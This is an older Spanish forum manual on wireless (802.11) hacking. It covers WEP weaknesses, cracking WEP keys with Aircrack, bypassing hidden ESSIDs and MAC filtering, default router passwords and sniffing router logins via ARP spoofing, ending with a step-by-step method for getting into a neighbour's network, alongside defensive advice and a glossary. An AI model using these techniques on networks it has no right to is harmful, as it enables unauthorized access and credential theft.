Los sniffers (también denominados analizadores de protocolos o "husmeadores").
El sniffing de paquetes es la práctica de capturar datos de red que no están destinados a tu máquina, generalmente con el propósito de ver tráfico confidencial (contraseñas, datos...)
Para snifar ("olfatear") es necesario entender como transmiten los paquetes las máquinas en una red.
Una vez configurada la tarjeta en modo monitor, trataremos de capturar los paquetes de otras redes o la propia (auditoría de seguridad) con el objetivo de saltarnos sus medidas de seguridad y asociarnos a la red (ancho de banda, datos confidenciales). Entramos en la parte jugosa del manual.
Aquí entran en juego factores de lo bien que esté configurada la red o no. Términos previos:
SSID (Service Set IDentifier) El SSID es un código de 32 caracteres alfanuméricos que llevan los paquetes de una WLAN para indentificarlos como parte de esa red. Por lo tanto todos los dispositivos inalámbricos que intentan comunicarse entre sí deben compartir el mismo ESSID. Las redes cuya infraestructura incorpora un punto de acceso, utilizan el ESSID (E de extendido). Sin embargo nos podemos referir a este como SSID en términos generales.
A menudo al ESSID se le conoce como nombre de la red.
El ESSID de la red ficticia del vecino está por defecto en emisión pública, cualquier usuario usando un stumbler podría detectar esta ESSID (nombre de red) y sabiendo que el ESSID actúa como la relación entre la estación cliente (tu máquina) y el AP, ya tienes el nombre de red, que será vital para asociarse a la red a la que "atacamos".
Es por esto que una medida fundamental de seguridad es desactivar la emisión pública del ESSID (broadcasting), y sino es posible, al menos ocultarlo para que un atacante inexperto no pueda continuar en su intento.
- El más que famoso WEP: (Wireless Equivalency Privacy)
Es el sistema de cifrado incluido en redes estándar 802.11 de los paquetes que se transmiten en una red wireless. El WEP viene inhabilitado por defecto. Un usuario sin conocimientos relativos al tema o un usuario medio no habilitará el WEP al instalar el AP. Esto constituye un gran error de seguridad ya que sino la red queda abierta a todo usuario.
WEP cifra y comprime los datos enviados por ondas de radio. Sin embargo, WEP no es precisamente el sistema de encriptación más potente del mercado. Incluso aunque esté habilitado nuestra red sigue siendo insegura.
Es "rompible" con los denominados WEP crackers . De esto hablaremos más tarde.
Para conocer las vulnerabilidades del cifrado WEP:
Manual de unravel (Hacking wireless - Chincheta)
http://foro.elhacker.net/index.php/topic,54992.0.html
Recuperando la intención de este manual, la compresión sobre todos los apartados en relación con el hacking wireless, voy a explicas de forma técnica el cifrado WEP. Es necesario para comprender esto unos conceptos previos de criptografía (Recomiendo el taller que ha comenzado la revista Hack x Crack HXC en el momento de redactar esto)
Código:
El cifrado WEP no es otro que el algoritmo de encriptación RC4 (Algoritmo de cifrado de flujo, es decir que funciona expandiendo una clave secreta o "seed" la cual es un generador de números psdeualeatoria)
Siguiendo las principales vulnerabilidades que afectan a este algoritmo proporcionado por RSA Security es posible reducir su potencia de 128 bits de cifrado a 24 bits. Lo que conlleva una disminución importante de la seguridad (de 2^104-1 a 2^24-1)
Además se usa un vector de inicialización (conocido como IV de 24 bits) la cual se añade a la seed mencionada antes, y cambia para cada trama. El receptor usa el mismo IV para chequear la integridad del mensaje.
Los IVS son públicos (no cifrados, en texto plano, o sea legibles), y aparecen en los paquetes transmitidos por la red. Como ya he dicho varían, el problema es que la máquina suele reutilizar IVS (no entro en detalles del porqué) y un intruso podría hacer con duplicados, montar una tabla y conocer el texto de un mensaje.
Para ello ha de servirse el intruso de un boli, papel y mucha paciencia para interpretar el flujo.
Pero esto nos llevaría demasiado tiempo, asi que se ha automatizado el proceso.
Esto es en esencia lo que hace un WEP cracker. Tras capturar una serie de paquetes, en el orden de 1 millón para romper un cifrado de 128 bits, estos programas rompen la clave WEP de forma pasiva, analizando los IVs débiles o repetidos.
No se crean que WEP es el único sistema de cifrado que existe, hay muchos más. Este es el más famoso y el más inestable.
El WPA es mucho más seguro, pero este sistema no es funcional en algunos host APs (routers) que funcionan con estándares IEEE 802.11 antiguos.
5.- ¿Qué WEP cracker utilizo en windows?:
Recimiente descubrí que la última versión del Aircrack la v2.1 tiene en su paquete zip una carpeta para windows 32bits. Las pruebas realizada por lovalost (que colabora conmigo en la realización de un taller de wireless, también moderador de este apartado) mostraron como resultados que el aircrack funciona más deprisa que cualquier otro WEP cracker probado en windows, aunque no alcanza la funcionabilidad que tiene en el SO (Sistema Operativo) Linux.
- ¿Cómo utilizar el aircrack en windows? by lovalost (Nuestro gran entendido del foro hacking wireless)
http://foro.elhacker.net/index.php/topic,64705.0.html
6.- Ataque por fuerza bruta al cifrado WEP:
Otra posibilidad para hacernos con la WEP key o clave WEP es realizar un ataque por fuerza bruta al cifrado WEP de un solo paquete. También se puede desplegar un ataque con diccionario. En este post explico la teoría y viabilidad del ataque, además de las herramientas para llevarlo a cabo.
- Ataque por fuerza bruta al cifrado WEP
http://foro.elhacker.net/index.php/topic,64471.0.html
7.- Sacar la clave WEP almacenada en una estación cliente con windows:
Si tenemos acceso físico a una de las máquinas de la red (con sistema operativo Windows) podremos extraer la clave WEP, ahorrándonos tiempo de trabajo.
- Sacando la clave WEP en un Windows XP:
http://foro.elhacker.net/index.php/topic,56008.msg281743.html#msg281743
- Haciendo funcional wzcook en un XP con SP2:
http://foro.elhacker.net/index.php/topic,61344.0.html
8.- Obstáculos en el ataque:
Como ya he dicho se ha desarrollado uno de los ataques más básicos a la red en sus diversas técnicas, sin embargo no por ser básico dejar de ser esencial.
Pero a la hora de hacer este ataque podemos encontrarnos algunas barreras que se despliegan como médidas básicas e insuficientes de seguridad, con la intención de desanimar a script kiddies. Un atacante avanzado habitualmente no suele ser peligroso (igual que un maestro en kung-fu no va por la calle buscando pelea). Las medidas comentadas ahora son las más comunes, no por esto las únicas, pero esto no es un manual avanzado (tiempo al tiempo)
1.- BROADCAST DEL ESSID DESACTIVADO (En un manual lo leí como ESSID cerrado): Al desactivar el BROADCAST del ESSID el AP deja de emitir marcos baliza
(beacon frames) y la red aparece como no en uso. Un programa que haga barrido activo no la detectará y sin embargo si lo conseguiremos mediante un barrido pasivo, ya que los paquetes siguen en el aire. Como ya he dicho el ESSID es el nombre de red y es vital para poder asociarnos a ella, en este caso no podremos visualizarlo y aunque logremos romper el WEP no tendremos nada que hacer.
La solución es la siguiente: Cuando está desactivado (el ESSID se envía en marcos de respuesta -request frames-), el ESSID sigue enviandose en paquetes de petición de asociación y reasociación. Entonces deberemos esperar con un "husmeador" activado a que un usuario se conecte a la red (ese paquete contendrá el nombre de la red). Pero ¿y si los usuarios están constantemente conectados? o ¿y si tenemos prisa?
Existen utilidades para realizar DoS (este ataque que yo sepa sólo es viable en Linux, nuestra punta de lanza en el hacking wierless) como Air-jack toolkit que, entre otras, lleva una aplicación llamada essid_jack, cuya función concreta es provocar que los clientes se tengan que reasociar al punto de acceso y así capturar el paquete de asociación que contiene el ESSID. Pero esto ya entra en un nivel alto en el que no entraremos aquí, así que pueden investigar o esperar hasta que publiquemos el manual avanzado.
2.- FILTRADO DE DIRECCIONEs MAC (ACL): (*Consultar MAC en vocabulario) Esta medida consiste en permitir solamente la conexión a cierto equipos atentiendo a su MAC. Sin embargo es posible cambiar la dirección MAC de nuestra tarjeta utlizando software específico, de este modo suplantaríamos la identidad de una de las máquinas de confianza (trusted). Esta técnica se conoce como MAC spoofing. Para saber que MAC deberemos emular, utilizaremos un husmeador (el más idóneo es Kismet).
- Cambio de dirección MAC:
http://foro.elhacker.net/index.php/topic,63350.0.html
9.- Medidas de seguridad:
- Físico:
Consiste en utilizar materiales que mitiguen las ondas de radio impidiendo que salgan de los límites del edificio.
-En la capa de enlace (capa 2):
> Habilitar WEP con el mayor número de bits posible.
> Habilitar WPA en vez de WEP si es que nuetros hardware es compatible (Tiene que ser compatibles tanto el AP como los AIs, deben por así decirlo, hablar en el mismo idioma para entenderse)
> Deshabilitar el broadcast (emisión pública) del ESSID (este método es bastante bueno porque la red no aparecerá como una red en uso). Pero no es suficiente como hemos visto, un atacante experto podría saltarse esta protección.
--------------------------------------------------------------------------------------------------------------------------
IMPORTANTE: Además de ocultar el ESSID, hay que cambiarlo para que no esté en predeterminado, porque sino sacando la OUI de la MAC nos bastaría para conocer el modelo de AP y buscar userID/password por defecto.
- Relación de la OUI con el modelo de AP:
http://standards.ieee.org/regauth/oui/oui.txt
--------------------------------------------------------------------------------------------------------------------------
> Habilitar el filtrado de direcciones MAC.
> Deshabilitar el DHCP.
> Cambiar la contraseña por defecto del router. En caso de que un atacante acceda a la red podría cerra puertas a otros usuarios, montar una backdoor (puerta trasera) mapeando los puertos de la NAT para conectarse de forma remota...
> Cambio habitual de la clave WEP, que es estática. De este modo un atacante podría perder el interés en nuestra red, ya que tendría que atacarla cada vez que se quisiese asociar.
> Cambiar la IP por defecto del AP.
Se han comentado las medidas de protección, sin embargo dejo el tema de detección de intrusos y utización de IDS (En nuestro caso WIDS ) para el manual avanzado. Pues este ya tiene una extensión considerable y sería entrar en demasiada profundidad. En el manual avanzado se incluirán algunas lecciones para una mejor comprensión:
- Capas OSI
- Criptografía
- Muchas más
10.- Accediendo al router (AP) de nuestra red para configurarlo (User ID/password por defecto):
Todos los APs vienen con nombre de usuario y contraseña por defecto de fábrica. Si ha sido instalado por un usuario que se sirve de una guía rápida o por un técnico negligente, el AP seguirá teniendo el mismo user ID y password que antes de salir de la caja.
Os dejo a continuación una página mencionada en este foro que tiene los users ID/passwords por defecto de las grandes compañías que comercializan APs que está además en constante actualización y te será muy útil.
http://www.phenoelit.de/dpl/dpl.html
Voy a comentar también que en los dos routers que he tenido la ocación de leer sus manuales (siendo de diferente distribuidoras) tenían como user ID por defecto: Admin y como contraseña por defecto: default.
Así que si no encontráis el AP que os interesa en el anterior web probad con lo segundo.
En la actualidad se han descrito en algunos topics del foro técnicas para sacar la contraseña de un router:
+ Sacando la contraseña de un router:
http://foro.elhacker.net/index.php/topic,62224.0.html
Por dividir las técnicas en dos ramas diferentes y que se entienda mejor el anterior post:
1.- Técnicas para filtrar los paquetes de una red, entre los cuales están los que van dirigidos al router, cuando el administrador se loguea en él.
Estas técnicas se utilizan cuando nosotros no somos el administrador de la red sino un intruso en ella. La intención es extraer el user ID (nombre de usuario) y password de acceso al router cuando el administrador se loguee.
Para ello nos podemos servir de un sniffer y técnicas de implementación del anterior ataque: ARP spoofing, ataques man-in-the-middle...
Manual de ARP spoofing by Fakedos: (Muy bueno y fácil de entender. Explica los tipos de redes: de hubs o conmutadas -switches-)
http://fakedos.all-inone.net/tecdocexplo/arpspoofing.htm
Metodología para hacerse con el nombre de usuario y contraseña del router si hemos realizado una intrusión a la red y no somos los administradores de esta:
1.- Instalar un sniffer y poner la tarjeta de red en modo promiscuo.
2.- Filtrar los protocolos que nos interesan para que no se nos desborde de la cantidad de datos: filtramos telnet y HTTP (que son los caminos de acceso al router)
3.- Se pueden utilizar técnicas de implementación del sniffing (Esto está descrito con anterioridad)
También podríamos instalar un keylogger en la máquina que utiliza el administrador. Hagan volar su imaginación.
2.- Si nos hemos olvidado de la contraseña de nuestro router, o nunca la supimos porque nos la instaló un técnico y en ese momento no sabíamos ni lo que estaba haciendo. Se subdividen básicamente en (detalladas en el anterior post):
- Ataque por fuerza bruta.
- Utilización de alguna vulnerabilidad (mediante exploit) conociendo el modelo de router (Se busca información en google. Esto será efectivo si el firmware no está actualizado y otros usuarios con conocimientos avanzados en programación publicaron información en torno a posibles fallos para ganar acceso al router)
- El log de la cookie.
- Llamada al técnico.
- Resetear el router y configurarlo de nuevo con los datos de conexión. Al resetear el router este vuelve a su configuración por defecto de fábrica, es conveniente buscar información de nuestro AP en la página oficial de este, donde seguro se explica en las FAQs como resetearlo, configurarlo...
Conviene aclarar que la contraseña del router no es la contraseña de red ni mucho menos, se tiende a confudir por usuarios inexpertos. La contraseña de red como ya hemos dicho es la WEP key, de ahí la importancia de saber crackearla.
11- ¿Por qué nos centramos tanto en WEP?
El protocolo de cifrado WEP, a pesar de las futuras revisiones, mejoras, alternativas... seguirá funcionando durante mucho tiempo, sin importar cómo de buenos y seguros sean sus sustitutos. Los motivos son los siguientes y conviene tenerlos en cuenta:
1- Es fácil configurar WEP y cualquier sistema conforme con el estándar 802.11 lo soporta, no ocurre lo mismo por ejemplo con WPA.
2- El hardware heredado podría no soportar los nuevos protocolos de seguridad y muchos usuarios no se desharán de él a pesar de las recomendaciones, nuevos estándars... ya que han invertido en su equipo un dinero que desean rentabilizar.
3- El hardware más moderno pasará a utilizar el nivel de seguridad del anterior harware para poder interactuar con él.
4- Muchos administradores de red debido a su ignorancia o pereza no actualizarán el firmware de sus sistemas para soportar sustitutos de WEP más seguros.
5- Los nuevos sistemas de seguridad conllevarán un esfuerzo en mantenerse actualizado y comprensión. Algunas pymes (pequeñas y medianas empresas) que disponen de estos métodos de intercomunicación entre máquinas se oponen por motivos económicos.
6- Algunas implementaciones de las especificación 802.11i requerirá renovar el hardware en su totalidad.
7- Todavía se pueden oir comentarios de los autodenominados "expertos" que opinan que WEP es un protocolo lo suficientemente seguro para redes domésticas y
pequeñas empresas.
De este modo los ataques contra WEP están hoy más de moda que nunca, a pesar de que WEP hace tiempo que quedo obsoleto. Sin embargo romper el WEP no es el último paso (como muchos atacantes consideran) en el ataque a una red. Por último cabe destacar, que los usuarios que llevan a cabo estos ataques sirviéndose de una guía paso a paso, no merecen otra categoría dentro de las comunidades de seguridad informática y hacking, que la de script kiddies o lammers.
Vamos a dar las características que debe reunir un usuario avanzado o entendido:
> Conocimiento de diversas técnicas de ataque:
- DoS (Ataques de Denegación de Servicio)
- Ataques de intermediario sobre la capa física.
- Inyectar tráfico para acelerar la ruptura de WEP.
- Conocer la estructura de los paquetes de las redes 802.11 y sus correspondientes marcos.
- Saber llevar el ataque a la zona cableada de la red.
- Saltar pequeñas barreras como el filtrado de direcciones MAC y ESSID cerrados, que hoy en día a pesar de su debilidad como medidas de seguridad siguien desanimando a muchos atacantes.
- Ruptura de 802.1x
- Inyectar tráfico inalámbrico cifrado.
- Creación de una puerta trasera (backchannel)
- Montaje de una red segura, desplegar VPNs
Así el pérfil de usuario aficionado e interesado momentáneamente en el tema es:
- Ruptura del cifrado WEP con sistema operativo Windows.
- Realizar barridos activos con una copia de Netstumbler.
quizás debería preguntarse en que grupo se enmarca y ¿qué medidas podría tomar para avanzar y aumentar sus conocimientos? No olvide que este texto es una simple introducción al tema de la seguridad wireless, que puede resultar en algunos niveles realmente complicado y requiere conocimientos sobre:
- Diferentes protocolos
- Criptografía
- Topología de redes
- Capas OSI
- Protocolo TCP a fondo
Pero antes debemos conocer unos conceptos básicos que serán nuestra base de apoyo en el avance. En estos momentos se está trabajando en el desarrollo de un taller o proyecto que comprenda algunos de estos puntos más avanzados explicados de la forma más sencilla posible. Por el momento se está trabajado en solucionar las dudas más habituales al iniciarse en el tema:
- ¿Qué tarjeta me recomiendan? ¿Cómo ponerla en modo monitor? ¿Qué es un chipset y para qué sirve?
- ¿Puede mi tarjeta entrar en modo monitor?
- ¿Qué programa uso para romper WEP en windows?
- ¿WEP o WPA?
De todas formas recomiendo encarecidamente que visiten el Recopilatorio de textos y enlaces de interés (en constante actualización) donde podrán encontrar respuestas a más preguntas como estas y a otras más avanzadas. No olviden la lectura de todas las chinchetas.
- Recopilación de textos y enlaces de interés:
http://foro.elhacker.net/index.php/topic,64843.0.html
- F.A.Q (Frequency Asked Questions):
http://foro.elhacker.net/index.php/topic,65591.0.html
12.- Conclusiones:
Las redes Wireless son todavía muy inseguras y es por esto que la política de seguridad de algunas empresas las prohíbe tajantemente. Debido a la dificultad de controlar la expansión de las ondas de radio, estas traspasan los límites del edificio, "tendiendo una mano" al intruso.
Cuando instalas un AP en tu domicilio, se dan varios casos que van a repercutir en la posterior seguridad de este AP.
- Lo instalas tú con un manual rápido sin habilitar WEP, ni cambiar la SSID por defecto, ni la IP por defecto del router...
- Lo instala un técnico incompetente con conocimientos mínimos que le bastan solamente para que funcione.
- Lo instala una empresa despreocupada por sus usuarios (Oí decir que telefónica no configuraba el router)
- Te lo instala un técnico competente o tú mismo habiendote leído esto. ---> Tendrás el culo bastante a salvo. (Recuerden que nada es seguro al 100%)
13.- BIBLIOGRAFÍA:
El taller de redes WIFI de Vic_THOR:
http://www.hackxcrack.com/phpBB2/viewtopic.php?t=21310
Manual de sniffers de LorD_Darkness:
http://ccia.ei.uvigo.es/docencia/SSI/SniffersPDF.pdf
Manual de redes wireless de Vicent Alapont:http://www.telefonica.net/web2/telamarinera/facu/seguridad_en_redes_inalambricas_by_vicent_alapont.zip
Diccionario enciclopédico Wikipedia: http://es.wikipedia.org/wiki/Portada --> Una maravilla para entender temas profundos que nos superan, buscar definiciones. Un consejo, tenedlo siempre a mano.
Taller práctico de intrusión en redes locales de Gospel (realmente bueno)
http://foro.elhacker.net/index.php/topic,45618.0.html
ESTE FORO que tanto me está enseñando sobre el tema.
Espero no dejarme ninguno.
Más mis conocimientos escasos sobre la seguridad informática.
14.- Expansión del manual:
Mi compañero moderador lovalost y yo estamos trabajando, de forma conjunta con el staff de elhacker en un taller avanzado sobre hacking wireless.
Pueden leer más sobre el proyecto manual de hacking wireless aquí:
http://foro.elhacker.net/index.php/topic,62868.0.html
15.- Metodología para hackear una red wireless:
1.- Comprar una tarjeta WNIC (AI)
2.- Hacer un barrido activo o pasivo para detectar las redes de los alrededores.
3.- Poner la tarjeta en modo monitor o RFMON.
4.- Utilizar un WEP cracker (Aircrack) para obtener el WEP key (contraseña de red)
Con el nombre de red ESSID y el WEP key ya podemos asociarnos y autentificarnos en la red.
5.- En nuestro camino quizás necesitemos sortear una serie de barreras como el filtrado de direcciones MAC, ESSID cerrados...
6.- En caso de acceso físico a una estación cliente de la red con Windows XP, utilizar un programa de recuperación de la WEP key.
7.- Proximamente se desarrollarán ataques más avanzados como inyección de tráfico para acelerar el proceso de ruptura de WEP, ataques hombre en medio (man-in-the-middle)...
DEFINICIONES:
Algunas de estas definiciones están extraídas del taller de Vic_THOR, que realizo un buen glosario de consulta.
Autenticado y asociado: Estado en el que un dispositivo wireless se une a la red de forma correcta y puede participar de los servicios que se ofrecen
Autenticado y disociado: Estado en el que un cliente ha sido reconocido por los dispositivos de la red wireless pero que todavía no puede emitir datos ni participar de los recursos.
Balizas/Beacons: Tramas de administración o sondas que emiten los puntos de acceso para informar a sus clientes o a otros puntos de acceso de su presencia y de otros datos.
BSSID: La MAC del punto de acceso
Desautenticado y disociado: Estado en el que un cliente está desconectado de la red y no se asoció con el Punto de Acceso
Filtrado de MAC: Método de configuración de seguridad en puntos de acceso que restringe a determinadas direcciones MAC la posibilidad de unirse a la red y autenticarse.
IEEE: Instituto de Ingenieros Eléctricos y Electrónicos, una asociación estadounidense dedicada a la estandarización.
Punto de acceso: (AP) Dispositivo que comunica redes de cable e inalámbricas.
Red inalámbrica (de área local) o WLAN o WIFI: El nombre técnico para denominarlas es redes 802.11. El protocolo IEEE 802.11 es un estándar de protocolo de comunicaciones de la IEEE que define el uso de los dos niveles más bajos de la arquitectura OSI (capas física y de enlace de datos), especificando sus normas de funcionamiento en una WLAN (Wireles LAN - red de área local)
SSID de difusión: Identificador de servicio vacío, es el equivalente a un ESSID con el valor Any, en el cual cualquier cliente puede conectarse a la WLAN.
WEP: Protocolo de seguridad para el cifrado del tráfico WLAN
Wi-Fi: Organización que certifica la interoperabilidad de dispositivos 802.11 como un estándar compatible y global de redes WLAN
WLAN: LAN inalámbrica
WPA: Acceso protegido Wi-FI que utiliza las características de 802.11i
802.11i: Estándar de seguridad para WLAN, combina el uso de 802.1x y protocolos de cifrado TKIP/CCMP que ofrece autenticación de usuario (no de dispositivo), confiabilidad e integridad de los datos.
16.- ENLACES DE INTERÉS:
17.- Anotaciones extras sobre la seguridad de redes wireless:
http://foro.elhacker.net/index.php/topic,56008.msg279739.html#msg279739
18.- Movernos en la red wireless:
http://foro.elhacker.net/index.php/topic,56008.msg279733.html#msg27973
19.- Utilizando un live CD de linux (Live CD específico para la auditoría inalámbrica, por si no queremos desinstalar nuestro windows, o instalar dos sistemas operativos)
http://foro.elhacker.net/index.php/topic,56008.msg279383.html#msg279383
20.- Manual de cómo hace un live-CD por BADBYTE-K (Aquí se puede enterar de lo que es un live-CD entre otras cosas)
http://foro.elhacker.net/index.php/topic,20178.0.html
21.- URL posteada por Fandango sobre wireless, Linux y wardriving en pdf:
-Herramientas de configuración de redes wireless en linux
(iwconfig, iwpriv)
http://jornadespl.upc.es/vell-02/jplupc2003/Mataro/wireless.pdf
------------------------------------------------------------------------
Depués de unas cuantas horas de redacción, correción, modificación, mejora y ampliación del texto, creo que me ha quedado un texto aceptable de iniciación en seguridad de redes 802.11
Lo he realizado con la intención de que cualquier usuario medio pueda comprenderlo en su totalidad.
Está escrito nada más que con finalidad didáctica y profundizar en el conocimiento de la inseguridad de las redes WLAN.
Lo que hagáis con esta información es vuestro asunto, no me resposabilizo.
Espero vuestras correciones, y ampliaciones. También lo que me haya podido dejar en el tintero.
Se lo quiero dedicar a mi vecino y amigo Kiko, por aguantarme cuando le doy la bara con el hacking y por prestarse como conejillo de indias para mis pruebas.
Saludos a todos, zerealkiller.
Documento Original
Autor: zerealkiller
Bueno, algunos ya conocen este texto que publiqué en un hilo y he mejorado y corregido durante bastante tiempo. Ahora creo que está listo para publicarlo en un topic a parte y espero que me comenten lo que les parece, he puesto mucho tiempo y esfuerzo en él. En el futuro, añadiré otros posts en este hilo sobre diversos temas, ataques más avanzados, incluiré explicaciones, nuevos enlaces...
Bienvenidos a este texto que he realizado con la intención de explicar una serie de conceptos básicos sobre las redes wireless (inalámbricas, 802.11), que considero fundamentales para poder entender un poco lo que nos traemos entre manos en el foro de hacking wireless.
Antes de nada comentar que algunos aspectos que no se desarrollan en exceso en este manual, se resumen o esquematizan, se pueden encontrar magistralmente explicados en el taller de Vic_THOR (*Bibliografía) por si necesitan ampliar sus conocimientos.
Si usted no sabe lo que son los estándares 802.11 le vuelvo a recomendar que visite el anterior taller, ya que contiene los conocimientos más básicos que no se explican en este manual. Es necesario conocer también la arquitectura de una red wifi 802.11
Al final del manual se ha introducido un glosario con las definiciones de los términos técnicos de redes 802.11 para su consulta en caso de duda.
INTRODUCCIÓN
El hacking como muchos ya sabrán no consiste en seguir los pasos de una receta de cocina. Consiste en conocer teóricamente las técnicas de ataque, fundamentos básicos del entorno... esto posibilita desarrollar nuevas herramientas de seguridad, combinar diferentes técnicas de ataque para aumentar la efectividad, desarrollar estrategias de ataque...
--------------------------------------------------------------------------------------------------------------------------
Antes de nada me parece vital distinguir entre:
- Hacking wireless:
Consiste en acceder a la red WLAN de otro usuario y utilizar su ancho de banda para conectarse a internet (es decir nos conectamos por el morro). Acceder a los recursos compartidos de los demás ordenadores de la red y sustraer datos confidenciales de todo tipo.
No es está en el fondo la inteción de este manual, sino comprender el tema, montado de una red segura, protección de esta, hacer una auditoría inalámbrica... en fin que lo de siempre léanse la ética del hacker (Muchos por aquí la necesitan y dan ganas de no postear nada pues se imaginan los usos que darán a esta información).
- Hacking una red con un router:
Consiste en ganar acceso a un ordenador que se encuentra detrás de una red y se conecta mediante un server/gateway/router (lo que sea) a internet. Sobre esto también estoy posteando así que si les interesa pueden mirar mis últimos mensajes, e informarse de como funcionan las IPs en una red, la teoría de ataque, métodos para saltarse router y firewall (como conexiones inversas ya sea mediante netcat o troyanos de conexión inversa)
+ Todo sobre hacking de una máquina en red que se conecta a través de un router en:
http://foro.elhacker.net/index.php/topic,62799.msg287872.html#msg287872
Esto lo digo porque son muchos los que no distinguen entre lo uno y lo otro y nada tienen que ver entre ellos.
--------------------------------------------------------------------------------------------------------------------------
La intención de este manual no es otra que puedan entender de qué hablan. Conceptos básicos de las redes 802.11 y su seguridad by Aironjack, espero que les sirva:
Conocimientos previos antes de empezar el tema: Sería imposible tratar todos los puntos partiendo desde cero. Habitualmente se aconseja antes de introducirse en redes:
- Conocer el modelo de capas OSI. *Ir al subforo de redes
- Conocer el protocolo TCP/IP. *Subforo de redes
- Conocer los diferentes estándares IEEE 802.11: Diferentes actualizaciones del estándar inicial en relación a la velocidad de transmisión de datos.
- Topología básica de redes.
1.- Hardware 802.11:
La monitorización de redes consiste en detectar las redes inalámbricas cuyas ondas llegan a nuestro captador de señal.
Equipo necesario: Para esto se necesita una tarjeta de red inalámbrica WNIC (Wireless Network Interface Card. También reciben el nombre de adaptador inalámbricos AIs) + un software para detectar APs (Access Points o puntos de acceso).
AI (Adaptador Inalámbrico): Es necesario saber como se mide la potencia. Nos tienen que sonar conceptos como: IR, EIRP... Para medirla se utilizan varias unidades: milivatios mW o decibelios dB. El modo más preciso es el dBm (decibelio por milivatio)
> Un aumento de 3dB duplica o reduce a la mitad la potencia.
> dBm = dBi
A la hora de escoger una tarjeta inalámbrica se deben tener en cuenta:
> El chipset: El chipset es el chip de la tarjeta, el cerebro si me permiten el término. En el siguiente enlace encontrarán un listado de modelos de tarjetas y sus respectivos chipsets.
http://www.linux-wlan.org/docs/wlan_adapters.html.gz
> Nivel de potencia de salida y posibilidad de ajustarlo
> Sensibilidad en la recepción
> Conectores para antenas externas
> Soporte de algoritmos de encriptación mejorados.
> Imporante: Compatibilidad con el sistema operativo.
Sobre el chipset podría estar hablando horas (jeje quizás no tanto).
1.1.- ¿Qué tarjeta escojo?
Es imposible hacer un estudio de mercado sobre todos los modelos disponibles, estudiar la relación calidad/precio, probar si las mediciones de potencia o distancia son correctas...
Esta pregunta no es nada fácil de responder sin conocer las circustancias del usuario: presupuesto, interés, ataques que piensa desplegar... Quizás no sepan que algunas herramientas están pensandas para actuar con chipsets determinados y que conseguir que funcionen con otros conllevaría adaptar el código, lo cual no está al alcance de muchos usuarios, ya sean avanzados, sino de expertos y profesionales.
En el subapartado de tarjetas inalámbricas (apartado de hardware 802.11) he comentado las especificaciones a considerar antes de la compra, repasemos. Voy a realizar una lista para guiar al comprador inexperto:
---------------------------------------------------------------------------------------------------------------------------> ¿De qué presupuesto dispone? Las tarjetas inalámbricas aún hoy en día no son tan baratas como sus compañeras de red 802.33 Ethernet, pero empiezan a tener precios muy asequibles. Las hay desde 20 euros hasta 300 o más (estas tienen de todo, por ejemplo pigtails que son realmente caros y a la hora de la verdad hay que ponerles cinta aislante para que no se hagan pupa al moverlos)
> ¿Qué sistema operativo tiene?
- windows: Una tarjeta con chipset Atheros es bastante recomendable. No encontrará problemas para ponerla en modo monitor con drivers airopeek de wildpackets, aunque hay más chipsets compatibles (sólo debe consultar el listado en la página de wildpackets). Un modelo interesante podría ser: Conceptronic c54c, aunque mi compañero lovalost me informó que ya no las fabrican, quizás pueda encontrarla rebajada en alguna tienda por internet (bendito stock!)
- Linux y BSD: La recomendación por antonomasia no deja de ser PRISM. ¿por qué? Pues básicamente porque permiten variedad de opciones:
- DoS, ruptura de WEP, fake APs, ataques man-in-the-middle...
- Porque funcionan con la gran mayoría de aplicaciones, etc.
- Están bien documentadas y darán poca guerra, perfectas para principiantes.
- Los linux con kernels a partir de 2.4.18 tienen controladores incorporados.
> ¿pero qué modelo?
No se olviden de cómo saber que chipset tiene nuestro modelo.
http://www.linux-wlan.org/docs/wlan_adapters.html.gz
> ADVERTENCIA! ¿Demasiado fácil, no? Pues hasta ahora sí. Entramos con el conocido y engorroso problema de las revisiones ¿qué son? Actualizaciones de un mismo modelo ¿qué actualizan? Hace un cambio del chipset.
Esto es reamente peligroso, porque podemos comprar un modelo de tarjeta pensando que tiene por ejemplo chipset Prism1 y resulta que tenga Prism Lamadrequeloparió (porque es la tercera revisión, mucho ojito!)
Los nuevos chipsets no suelen tener, cuando salen, mucha cobertura. Dan problemas y en ocasiones no hay drivers para que puedan entrar en modo monitor, porque se están desarrollando. Por eso son muchos los piratas del aire que recomiendan usar Intersil Prisms antiguas, porque lo retro está de moda.
¿pero cómo sé que revisión tiene la tarjeta? Aquí es donde viene lo peor. La revisión es algo que viene escrito en la parte de atrás de las tarjetas y casi ninguna web tiene tal exceso de información que comente la revisión, es por esto que es recomendable comprar la tarjeta en una tienda especializada con un dependiente que comprenda lo que está tratanto de vender y pueda abrir la caja. Sino podemos buscar por internet sobre nuestro modelo y descubrir si tiene revisiones conflictivas.
Cuidense mucho pues sino pueden llevarse una desagradable sorpresa, como por ejemplo encontrarse con un chipset que hayan inventado dos muertos de hambre y no tenga controladores de ningún tipo.
> Pues ahora pueden consultar el listado de tarjetas, donde vienen los chipsets, informarse de si tienen conectores externos para antenas y de qué tipo, buscar en una tienda virtual o google el modelo, precios aproximados y decidirse.
--------------------------------------------------------------------------------------------------------------------------
En estos momentos si tienes una red inalámbrica cuyas ondas de radio lleguen hasta el captador, detectarás el AP correspondiente a esa WLAN (Red LAN wireless).
Pero y si nuetros vecinos aún no se han modernizado y no cuentan con la última tecnología, tan presente hoy en todas las compañías telefónicas (nos regalan un router en los donetes, con los tazos de matutano...)
El proceso se puede implementar con un portátil para poder salir de casa e ir en busca de redes en un centro comercial, otros edificios...
Es aquí donde surge el conocido término wardriving: que no es otra cosa que ir en busca de redes con un coche, así también está el warcycling (en bici para mantenernos en forma), warwalking (dando un paseito, estilo golf)...
Si somos vagos por naturaleza o nos gusta demasiado el sillón-ball (deporte de riesgo donde los haya) podemos aumentar nuestra potencia de detección. Así sin movernos de casa, detectaremos redes a largas distancias.
1.2.- Material necesario para la detección a larga distancia:
- Una antena: Lo que hace la antena es "apuntar", dirigir la señal aumentando su calidad. Desde la perspectiva de un atacante:
> La distancia supone ocultación física y alejamiento.
> Es esencial para ataques sobre la capa física, de denegación de servicios (DoS) y ataques man-in-the-middle (de intermediario).
Para comprender las antenas son necesarios unos conceptos básicos de rediofrecuencia, que no trataremos en este texto, debido a la extensión del asunto. Un par de apuntes:
> La ganancia de un antena es la amplificación de potencia. Se expresa en dBi y es pasiva, ya que la antena como hemos dicho no añade en realidad potencia, sino que enfoca las ondas radiadas para conseguir un haz más estrecho (apunta)
> El ancho de haz determina la zona de cobertura de la antena. Conviene no olvidar su tridimensionalidad.
